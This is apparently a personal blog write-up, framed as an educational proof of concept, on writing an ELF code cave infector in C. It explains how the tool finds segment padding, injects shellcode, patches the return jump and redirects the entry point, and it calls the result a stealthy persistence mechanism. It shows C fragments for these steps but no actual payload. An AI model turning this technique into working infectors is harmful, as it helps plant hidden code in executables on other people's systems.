Deep Dive: Writing an ELF Code Cave Infector in C

Table of Contents

Disclaimer: This tool is a Proof of Concept (PoC) for educational purposes only.

Understanding how Linux executables work under the hood is the best way to understand system security. In this project, I built a “Code Cave Injector” — a tool that hides a payload inside an existing binary without changing its file size.

Here is a breakdown of how my Infektor tool works, referencing the source code.

The Concept: What is a “Code Cave”?
#

When a compiler (like GCC) builds a program, it organizes the code into Segments. To optimize memory access, these segments are aligned to Page Boundaries (usually 4096 bytes / 0x1000).

Because code rarely fits exactly into these 4096-byte blocks, there is often empty space (padding) filled with zeros at the end of the executable segment. This gap is called a Code Cave.

Visualizing the gaps between segments in an ELF file.

My tool finds this gap and inserts shellcode into it.

Key Implementation Details
#

The injector performs three main tasks:

Map the target binary into memory.
Find a suitable gap (Code Cave) in the executable segment.
Inject the payload and hijack the Entry Point.

1. Memory Mapping (mmap)
#

Instead of using standard read/write calls, I used mmap. This maps the file directly into the program’s virtual memory space. Any change I make to the memory array file[] is written directly to the disk thanks to the MAP_SHARED flag.
```
unsigned char *file = mmap(
    NULL,
    size,
    PROT_READ | PROT_WRITE,
    MAP_SHARED, // Writes sync back to the file
    fd,
    0
);
```

2.The Safety Check (`calculate_gap`)
#

This is the most critical part of the code. If we blindly inject code, we might overwrite the next segment (like .data or .rodata), crashing the program.

I implemented a function calculate_gap that looks at the PT_LOAD segment headers to measure exactly how much space exists before the next segment starts.

size_t calculate_gap(Elf64_Phdr *target, Elf64_Phdr *all_hdrs, int count, size_t file_size)
{
    Elf64_Off target_end = target->p_offset + target->p_filesz;
    Elf64_Off nearest_next_start = file_size;

    // Scan all headers to find the one that starts immediately after our target
    for (int i = 0; i < count; i++) {
        Elf64_Off current_start = all_hdrs[i].p_offset;
        if (current_start >= target_end) {
            if (current_start < nearest_next_start) {
                nearest_next_start = current_start;
            }
        }
    }
    return nearest_next_start - target_end;
}

If size_payload > available_gap, the tool aborts with a CRITICAL ERROR. This ensures reliability.

3. Hijacking Execution (infection)
#

Once the space is confirmed, the injection happens.

Copy Payload: I copy the shellcode to the end of the text segment.
Patch Return Address: My payload needs to jump back to the original program so the user doesn’t notice anything. I calculate jt_offset and patch the jump_target variable inside the shellcode dynamically.
Update Entry Point: Finally, I modify the ELF Header (e_entry) to point to my new code location (payload_va).

int infection(int fd, Elf64_Ehdr *ehdr, Elf64_Phdr *phdr, unsigned char *file)
{
    // ... logic to calculate offsets ...

    // Patch the payload with the original entry point
    memcpy(payload_dst + jt_offset, &original_entry, sizeof(Elf64_Addr));

    // Hijack the binary entry point
    ehdr->e_entry = payload_va;

    // Officially extend the segment size to include the payload
    phdr->p_filesz += size;
    phdr->p_memsz += size;

    return 0;
}

Linking C and Assembly
#

One interesting challenge was linking the C injector with the Assembly payload. I used extern symbols to access labels defined in the .s file directly from C.

extern unsigned char payload_start;
extern unsigned long jump_target;

This allows the C code to measure the payload size dynamically and know exactly where to patch the jump addresses.

Conclusion
#

This project was a deep dive into the ELF file format. By manipulating Elf64_Phdr structures directly, I learned how the OS loader parses binaries. The result is a stealthy persistence mechanism that leaves the file size unchanged on the disk (ls -l shows no difference!).

The Concept: What is a “Code Cave”? #

Key Implementation Details #

1. Memory Mapping (mmap) #

2.The Safety Check (calculate_gap) #

3. Hijacking Execution (infection) #

Linking C and Assembly #

Conclusion #